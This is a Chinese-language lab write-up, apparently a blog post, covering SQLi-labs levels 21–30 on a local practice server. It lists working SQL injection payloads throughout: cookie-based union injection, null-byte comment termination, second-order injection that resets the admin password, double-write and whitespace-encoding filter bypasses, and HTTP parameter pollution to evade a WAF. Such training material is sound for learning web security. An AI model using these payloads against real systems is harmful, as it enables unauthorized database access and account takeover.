sql 注入 21-30

Less-21

  1. 先登录 admin admin
  2. 登陆成功后,使用cookie editor 查看cookie
  3. 解密cookie 发现是admin
  4. 将**’) union select 1,2,database()#**加密后输入
  5. 剩余步骤正常注入在这里插入图片描述

Less-22

同Less-21的区别是 ” union select 1,2,database()#
在这里插入图片描述

剩余步骤正常注入

Less-23

http://127.0.0.1/sqli/Less-23/?id=1//显示的有信息

在这里插入图片描述

http://127.0.0.1/sqli/Less-23/?id=1'//此时显示报错

在这里插入图片描述
出现报错

http://127.0.0.1/sqli/Less-23/?id=1'--+//此时无法正常闭合

在这里插入图片描述
查看源码在这里插入图片描述
将# --+ 均进行了替换,替换为空格
%00通过这个注释进行注释

http://127.0.0.1/sqli/Less-23/?id=1';%00

剩余步骤正常注入

http://127.0.0.1/sqli/Less-23/?id=11111' union select 1,2, 3;%00

Less-24

  1. 首先查询目前的user信息,找到admin的密码
  2. 用admin’# 注册一个账号,再登陆
  3. 修改admin 的密码
  4. SQL语句:
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$curr_pass'
UPDATE users SET PASSWORD='123456' where username='admin'

Less-25

http://127.0.0.1/sqli/Less-25/?id=1'//有报错信息
http://127.0.0.1/sqli/Less-25/?id=1'--+//尝试闭合,发现返回正常

在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1' order by 2--+//有报错

在这里插入图片描述
在这里插入图片描述
or 消失,查看源码
在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1' OorRder by 2--+//双写绕过

在这里插入图片描述
在MYSQL中对于大小写并不敏感

http://127.0.0.1/sqli/Less-25/?id=1' union select 1,2,3--+//无回显位置
http://127.0.0.1/sqli/Less-25/?id=1112' union select 1,2,3--+//有回显信息

在这里插入图片描述
在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1112' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata--+//双写绕过

Less-25a

查看源码
在这里插入图片描述
在这里插入图片描述
无包裹

Less-26
查看源码
在这里插入图片描述
双引号不报错,单引号报错,说明应该使用单引号闭合
在这里插入图片描述
对于空格和and 都过滤
对于and 可以进行双写绕过,对于空格可以使用url编码绕过
%09 Tab键(水平)
%0a 新建一行
%0c 新的一页
%0d return 键
%0b Tab键(垂直)
%a0 空格
() 绕过

Less-26a

在这里插入图片描述
使用 ')即可

Less-27

查看源码
在这里插入图片描述
发现过滤了union select ,可以使用大小写绕过
%0A可以当作括号

Less-27a

在这里插入图片描述
这里将报错关了,语句由上一关的单引号,变成了无单引号,经过测试,可以通过双引号进行闭合
其余同上一关

Less-28

在这里插入图片描述
匹配了union select 还有select ,其余和上面相同
双写绕过即可

Less-28a

在这里插入图片描述
查看源码,发现只过滤了union select 其余的过滤全都放开了

Less-29

基于WAF的一个错误
HTTP参数污染,攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者来进行客户端或者服务器端的攻击
WAT服务器只解析重复参数里面的前者,而真正的Web 服务器(Apache)只解析重复参数里面的后者,我们可以传入两个id参数,前者合法而后者为我们想注入的内容
我们的后端是Apache ,所以我们是只要将参数放在后面即可
在这里插入图片描述

Less-30

在这里插入图片描述
同上一关的方法,只是这关换成了双引号

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值